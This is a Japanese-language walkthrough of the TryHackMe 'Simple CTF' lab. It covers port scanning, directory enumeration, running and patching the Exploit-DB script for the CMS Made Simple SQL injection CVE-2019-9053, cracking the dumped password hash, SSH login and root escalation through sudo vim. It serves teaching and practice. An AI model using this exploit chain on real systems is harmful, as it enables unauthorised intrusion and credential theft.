Open8
[Try Hach Me]Simple CTF
kenryoHow many services are running under port 1000?
What is running on the higher port?
ポート番号が1000以下のポート数および1000より大きいポートで動いているサービスを答える。
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p 1000- --min-rate 5000 10.10.68.71
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-07 00:36 JST
Nmap scan report for 10.10.68.71
Host is up (0.27s latency).
Not shown: 64535 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.71 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p -1000 --min-rate 5000 10.10.68.71
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-07 00:37 JST
Nmap scan report for 10.10.68.71
Host is up (0.26s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds
What's the CVE you're using against the application?
To what kind of vulnerability is the application vulnerable?
gobusterでapacheがホストしているリソースを確認する。
sampleディレクトリが見れそう。
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 10.10.172.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.172.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/simple (Status: 301) [Size: 315] [--> http://10.10.172.123/simple/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
sampleにアクセス。
アプリケーションはCMS Made Simple version 2.2.8で作られているよう。
NVDで検索したらいろいろヒットした。
関連エクスプロイトも見つかった。SQL Injectionの脆弱性があるよう。
以上から答えはCVE-2019-9053。
kenryoWhat's the password?
Exploit Databaseに掲載されているコードを使用し、パスワードをクラックしてみる。
コードはpython2系のものだったので2to3でpython3系に変換した。
┌──(kali㉿kali)-[~]
└─$ 2to3 -w Desktop/46635.py
/usr/bin/2to3:3: DeprecationWarning: lib2to3 package is deprecated and may not be able to parse Python 3.10+
from lib2to3.main import main
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored Desktop/46635.py
--- Desktop/46635.py (original)
+++ Desktop/46635.py (refactored)
@@ -22,10 +22,10 @@
options, args = parser.parse_args()
if not options.url:
- print "[+] Specify an url target"
- print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
- print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
- print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+ print("[+] Specify an url target")
+ print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
+ print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
+ print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
@@ -60,13 +60,13 @@
def beautify_print_try(value):
global output
- print "\033c"
+ print("\033c")
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
- print "\033c"
+ print("\033c")
cprint(output,'green', attrs=['bold'])
def dump_salt():
@@ -180,7 +180,7 @@
dump_password()
if options.cracking:
- print colored("[*] Now try to crack password")
+ print(colored("[*] Now try to crack password"))
crack_password()
beautify_print()
RefactoringTool: Files that were modified:
RefactoringTool: Desktop/46635.py
┌──(kali㉿kali)-[~]
└─$ python Desktop/46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
説明に従ってクラックしてみたが、実行エラーになった。
┌──(kali㉿kali)-[~]
└─$ python Desktop/46635.py -u http://10.10.172.123/sample --crack -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Salt for password found:
[+] Username found:
[+] Email found:
[+] Password found:
[*] Try: # directory-list-2.3-small.txt
Traceback (most recent call last):
File "/home/kali/Desktop/46635.py", line 184, in <module>
crack_password()
File "/home/kali/Desktop/46635.py", line 56, in crack_password
if hashlib.md5(str(salt) + line).hexdigest() == password:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: Strings must be encoded before hashing
hashlib.md5にstringを渡しているが、byteを渡さなければいけないらしい。
引数に渡しているstringをencode('utf-8')で変換するよう修正。
また、ワードリストをrockyou.txtに変更した。
実行したら、再度エラーになった。
rockyou.txtにUTF-8以外の文字があり、デコードできないみたい。
[+] Salt for password found:
[+] Username found:
[+] Email found:
[*] Try: $
[*] Now try to crack password
Traceback (most recent call last):
File "/home/kali/Desktop/46635.py", line 184, in <module>
crack_password()
File "/home/kali/Desktop/46635.py", line 53, in crack_password
for line in dict.readlines():
^^^^^^^^^^^^^^^^
File "<frozen codecs>", line 322, in decode
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 923: invalid continuation byte
┌──(kali㉿kali)-[~]
└─$ file rockyou.txt
rockyou.txt: Unicode text, UTF-8 text
kali付属のrockyou.txtをutf8に変換し、それを使用するようにした。
iconv -f ISO-8859-1 -t UTF-8 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt
無事クラックできた。
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: ■■■
Where can you login with the details obtained?
nmapの結果からftpかssh。
sqliの結果からユーザー名も分かったので、sshでログインしてみたところ成功した。
┌──(kali㉿kali)-[~]
└─$ ssh mitch@10.10.11.241 -p 2222
The authenticity of host '[10.10.11.241]:2222 ([10.10.11.241]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.11.241]:2222' (ED25519) to the list of known hosts.
mitch@10.10.11.241's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ pwd
/home/mitch
What's the user flag?
ログイン後、ホームディレクトリにuser.txtがあり、それにフラグが記載されていた。
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ pwd
/home/mitch
$ ls
user.txt
$ cat user.txt
Is there any other user in the home directory? What's its name?
ホームディレクトリを確認するとsunbathがいた。
$ cd ..
$ ls
mitch sunbath
What can you leverage to spawn a privileged shell?
mitchがsudoを許可されているコマンドをsudo -lで調べる。
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
What's the root flag?
vim spawn a privilegedなどでググると以下のページが見つかった。
sudo vimでvimを開き:!shを打つと、rootで操作できるようになる。
実施し、rootディレクトリにあるテキストファイルからフラグを取得した。
$ sudo vim
# whoami
root
# ls
mitch sunbath
# cd /root
# ls
root.txt
# cat root.txt